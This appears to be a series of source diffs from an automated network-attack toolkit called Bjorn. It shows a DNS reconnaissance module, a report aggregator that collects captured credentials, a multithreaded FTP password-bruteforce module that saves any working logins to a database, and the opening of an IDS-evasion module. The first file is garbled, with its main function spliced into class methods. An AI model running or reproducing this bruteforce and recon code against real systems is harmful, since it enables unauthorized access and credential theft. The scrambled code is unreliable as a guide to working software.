logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
def main():
parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
parser.add_argument("-d", "--domain", help="Target domain for enumeration")
parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
args = parser.parse_args()
return records
settings = load_settings()
domain = args.domain or settings.get("domain")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
recursive = args.recursive or settings.get("recursive")
def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
"""Resolve a nameserver hostname to an IP address."""
ns = nameserver.strip().rstrip(".")
if not domain:
logging.error("Domain is required. Use -d or save it in settings")
return
# Check if already an IP
try:
socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
save_settings(domain, wordlist, output_dir, threads, recursive)
# Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
pillager = DNSPillager(
domain=domain,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
recursive=recursive
)
pillager.execute()
# Socket fallback
try:
result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
if result:
return result[0][4][0]
except Exception:
pass
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
main()
shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,457 +1,165 @@
# Data collection and organization tool to aggregate findings from other modules.
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input Input directory to monitor (default: /home/bjorn/Bjorn/data/output/).
# -o, --output Output directory for reports (default: /home/bjorn/Bjorn/data/reports).
# -f, --format Output format (json, html, md, default: all).
# -w, --watch Watch for new findings in real-time.
# -c, --clean Clean old data before processing.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""
import os
import json
import argparse
from datetime import datetime
import logging
import time
import shutil
import glob
import watchdog.observers
import watchdog.events
import markdown
import jinja2
import threading
import time
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_enabled = 0
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")
# HTML template for reports
HTML_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
<title>Bjorn Reconnaissance Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
.vuln-high { background-color: #ffebee; }
.vuln-medium { background-color: #fff3e0; }
.vuln-low { background-color: #f1f8e9; }
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f5f5f5; }
h1, h2, h3 { color: #333; }
.metadata { color: #666; font-style: italic; }
.timestamp { font-weight: bold; }
</style>
</head>
<body>
<h1>Bjorn Reconnaissance Report</h1>
<div class="metadata">
<p class="timestamp">Generated: {{ timestamp }}</p>
</div>
{% for section in sections %}
<div class="section">
<h2>{{ section.title }}</h2>
{{ section.content }}
</div>
{% endfor %}
</body>
</html>
"""
b_args = {
"input_dir": {
"type": "text",
"label": "Input Data Dir",
"default": "/home/bjorn/Bjorn/data/output"
},
"output_dir": {
"type": "text",
"label": "Reports Dir",
"default": "/home/bjorn/Bjorn/data/reports"
},
"watch": {
"type": "checkbox",
"label": "Continuous Watch",
"default": True
},
"format": {
"type": "select",
"label": "Report Format",
"choices": ["json", "md", "all"],
"default": "all"
}
}
class FreyaHarvest:
def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
formats=None, watch_mode=False, clean=False):
self.input_dir = input_dir
self.output_dir = output_dir
self.formats = formats or ['json', 'html', 'md']
self.watch_mode = watch_mode
self.clean = clean
def __init__(self, shared_data):
self.shared_data = shared_data
self.data = defaultdict(list)
self.observer = None
self.lock = threading.Lock()
self.last_scan_time = 0
def clean_directories(self):
"""Clean output directory if requested."""
if self.clean and os.path.exists(self.output_dir):
shutil.rmtree(self.output_dir)
os.makedirs(self.output_dir)
logging.info(f"Cleaned output directory: {self.output_dir}")
def collect_wifi_data(self):
"""Collect WiFi-related findings."""
try:
wifi_dir = os.path.join(self.input_dir, "wifi")
if os.path.exists(wifi_dir):
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['wifi'].append(data)
except Exception as e:
logging.error(f"Error collecting WiFi data: {e}")
def collect_network_data(self):
"""Collect network topology and host findings."""
try:
network_dir = os.path.join(self.input_dir, "topology")
if os.path.exists(network_dir):
for file in glob.glob(os.path.join(network_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['network'].append(data)
except Exception as e:
logging.error(f"Error collecting network data: {e}")
def collect_vulnerability_data(self):
"""Collect vulnerability findings."""
try:
vuln_dir = os.path.join(self.input_dir, "webscan")
if os.path.exists(vuln_dir):
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['vulnerabilities'].append(data)
except Exception as e:
logging.error(f"Error collecting vulnerability data: {e}")
def collect_credential_data(self):
"""Collect credential findings."""
try:
cred_dir = os.path.join(self.input_dir, "packets")
if os.path.exists(cred_dir):
for file in glob.glob(os.path.join(cred_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['credentials'].append(data)
except Exception as e:
logging.error(f"Error collecting credential data: {e}")
def collect_data(self):
"""Collect all data from various sources."""
self.data.clear() # Reset data before collecting
self.collect_wifi_data()
self.collect_network_data()
self.collect_vulnerability_data()
self.collect_credential_data()
logging.info("Data collection completed")
def generate_json_report(self):
"""Generate JSON format report."""
try:
report = {
'timestamp': datetime.now().isoformat(),
'findings': dict(self.data)
}
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
with open(output_file, 'w') as f:
json.dump(report, f, indent=4)
logging.info(f"JSON report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating JSON report: {e}")
def generate_html_report(self):
"""Generate HTML format report."""
try:
template = jinja2.Template(HTML_TEMPLATE)
sections = []
# Network Section
if self.data['network']:
content = "<h3>Network Topology</h3>"
for topology in self.data['network']:
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
content += "</table>"
sections.append({"title": "Network Information", "content": content})
# WiFi Section
if self.data['wifi']:
content = "<h3>WiFi Findings</h3>"
for wifi_data in self.data['wifi']:
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
for network in wifi_data.get('networks', []):
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
content += f"<td>{network.get('security', 'Unknown')}</td>"
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "WiFi Networks", "content": content})
# Vulnerabilities Section
if self.data['vulnerabilities']:
content = "<h3>Discovered Vulnerabilities</h3>"
for vuln_data in self.data['vulnerabilities']:
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
for vuln in vuln_data.get('findings', []):
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
content += f"<tr class='{severity_class}'>"
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
content += f"<td>{vuln.get('description', 'No description')}</td>"
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
content += "</table>"
sections.append({"title": "Vulnerabilities", "content": content})
# Credentials Section
if self.data['credentials']:
content = "<h3>Discovered Credentials</h3>"
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
content += f"<td>{cred.get('source', 'Unknown')}</td>"
content += f"<td>{cred.get('service', 'Unknown')}</td>"
content += f"<td>{cred.get('username', 'Unknown')}</td>"
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "Credentials", "content": content})
# Generate HTML
os.makedirs(self.output_dir, exist_ok=True)
html = template.render(
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
sections=sections
)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
with open(output_file, 'w') as f:
f.write(html)
logging.info(f"HTML report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating HTML report: {e}")
def generate_markdown_report(self):
"""Generate Markdown format report."""
try:
md_content = [
"# Bjorn Reconnaissance Report",
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
]
# Network Section
if self.data['network']:
md_content.append("## Network Information")
for topology in self.data['network']:
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
md_content.append("\n| IP | MAC | Open Ports | Status |")
md_content.append("|-------|-------|------------|---------|")
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
# WiFi Section
if self.data['wifi']:
md_content.append("\n## WiFi Networks")
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
md_content.append("|------|--------|-----------|---------|----------|")
for wifi_data in self.data['wifi']:
for network in wifi_data.get('networks', []):
md_content.append(
f"| {network.get('ssid', 'Unknown')} | "
f"{network.get('bssid', 'Unknown')} | "
f"{network.get('security', 'Unknown')} | "
f"{network.get('signal_strength', 'Unknown')} | "
f"{network.get('channel', 'Unknown')} |"
)
# Vulnerabilities Section
if self.data['vulnerabilities']:
md_content.append("\n## Vulnerabilities")
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
md_content.append("|------|-----------|--------|-------------|----------------|")
for vuln_data in self.data['vulnerabilities']:
for vuln in vuln_data.get('findings', []):
md_content.append(
f"| {vuln.get('type', 'Unknown')} | "
f"{vuln.get('severity', 'Unknown')} | "
f"{vuln.get('target', 'Unknown')} | "
f"{vuln.get('description', 'No description')} | "
f"{vuln.get('recommendation', 'No recommendation')} |"
)
# Credentials Section
if self.data['credentials']:
md_content.append("\n## Discovered Credentials")
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
md_content.append("|------|---------|----------|-----------|------------|")
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
md_content.append(
f"| {cred.get('type', 'Unknown')} | "
f"{cred.get('source', 'Unknown')} | "
f"{cred.get('service', 'Unknown')} | "
f"{cred.get('username', 'Unknown')} | "
f"{cred.get('timestamp', 'Unknown')} |"
)
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
with open(output_file, 'w') as f:
f.write('\n'.join(md_content))
logging.info(f"Markdown report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating Markdown report: {e}")
def generate_reports(self):
"""Generate reports in all specified formats."""
os.makedirs(self.output_dir, exist_ok=True)
def _collect_data(self, input_dir):
"""Scan directories for JSON findings."""
categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
new_findings = 0
if 'json' in self.formats:
self.generate_json_report()
if 'html' in self.formats:
self.generate_html_report()
if 'md' in self.formats:
self.generate_markdown_report()
def start_watching(self):
"""Start watching for new data files."""
class FileHandler(watchdog.events.FileSystemEventHandler):
def __init__(self, harvester):
self.harvester = harvester
for cat in categories:
cat_path = os.path.join(input_dir, cat)
if not os.path.exists(cat_path): continue
def on_created(self, event):
if event.is_directory:
return
if event.src_path.endswith('.json'):
logging.info(f"New data file detected: {event.src_path}")
self.harvester.collect_data()
self.harvester.generate_reports()
self.observer = watchdog.observers.Observer()
self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
self.observer.start()
for f_path in glob.glob(os.path.join(cat_path, "*.json")):
if os.path.getmtime(f_path) > self.last_scan_time:
try:
with open(f_path, 'r', encoding='utf-8') as f:
finds = json.load(f)
with self.lock:
self.data[cat].append(finds)
new_findings += 1
except: pass
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.observer.stop()
self.observer.join()
if new_findings > 0:
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
self.last_scan_time = time.time()
def execute(self):
"""Execute the data collection and reporting process."""
def _generate_report(self, output_dir, fmt):
"""Generate consolidated findings report."""
if not any(self.data.values()):
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
os.makedirs(output_dir, exist_ok=True)
if fmt in ['json', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
with open(out_file, 'w') as f:
json.dump(dict(self.data), f, indent=4)
self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
if fmt in ['md', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
with open(out_file, 'w') as f:
f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
for cat, items in self.data.items():
f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
watch = getattr(self.shared_data, "freya_harvest_watch", True)
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
start_time = time.time()
try:
logging.info("Starting data collection")
if self.clean:
self.clean_directories()
# Initial data collection and report generation
self.collect_data()
self.generate_reports()
# Start watch mode if enabled
if self.watch_mode:
logging.info("Starting watch mode for new data")
try:
self.start_watching()
except KeyboardInterrupt:
logging.info("Watch mode stopped by user")
finally:
if self.observer:
self.observer.stop()
self.observer.join()
logging.info("Data collection and reporting completed")
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
self._collect_data(input_dir)
self._generate_report(output_dir, fmt)
# Progress
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if not watch:
break
time.sleep(30) # Scan every 30s
self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
except Exception as e:
logging.error(f"Error during execution: {e}")
raise
finally:
# Ensure observer is stopped if watch mode was active
if self.observer and self.observer.is_alive():
self.observer.stop()
self.observer.join()
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_dir": input_dir,
"output_dir": output_dir,
"formats": formats,
"watch_mode": watch_mode,
"clean": clean
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Data collection and organization tool")
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
help="Output format")
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
args = parser.parse_args()
settings = load_settings()
input_dir = args.input or settings.get("input_dir")
output_dir = args.output or settings.get("output_dir")
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
watch_mode = args.watch or settings.get("watch_mode", False)
clean = args.clean or settings.get("clean", False)
save_settings(input_dir, output_dir, formats, watch_mode, clean)
harvester = FreyaHarvest(
input_dir=input_dir,
output_dir=output_dir,
formats=formats,
watch_mode=watch_mode,
clean=clean
)
harvester.execute()
logger.error(f"FreyaHarvest error: {e}")
return "failed"
return "success"
if __name__ == "__main__":
main()
from init_shared import shared_data
harvester = FreyaHarvest(shared_data)
harvester.execute("0.0.0.0", None, {}, "freya_harvest")

View File

@@ -1,9 +1,9 @@
"""
ftp_bruteforce.py FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp')
- Conserve la logique dorigine (queue/threads, sleep éventuels, etc.)
- Succès -> DB.creds (service='ftp')
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
"""
import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
@@ -27,7 +28,7 @@ b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800, # 30 minutes entre deux runs
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class FTPBruteforce:
@@ -43,22 +44,21 @@ class FTPBruteforce:
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
# comportement original : un petit délai visuel
time.sleep(5)
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IP(MAC, Hostname)."""
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -69,6 +69,7 @@ class FTPConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -112,10 +113,11 @@ class FTPConnector:
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password)
try:
conn.quit()
@@ -171,14 +173,17 @@ class FTPConnector:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password):
if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Pause configurable entre chaque tentative FTP
@@ -187,46 +192,54 @@ class FTPConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) + 1 # (logique d'origine conservée)
if len(self.users) * len(self.passwords) == 0:
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.join()
for t in threads:
t.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
@@ -266,3 +279,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,318 +1,167 @@
# Stealth operations module for IDS/IPS evasion and traffic manipulation.a
# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Network interface to use (default: active interface).
# -m, --mode Operating mode (timing, random, fragmented, all).
# -d, --delay Base delay between operations in seconds (default: 1).
# -r, --randomize Randomization factor for timing (default: 0.5).
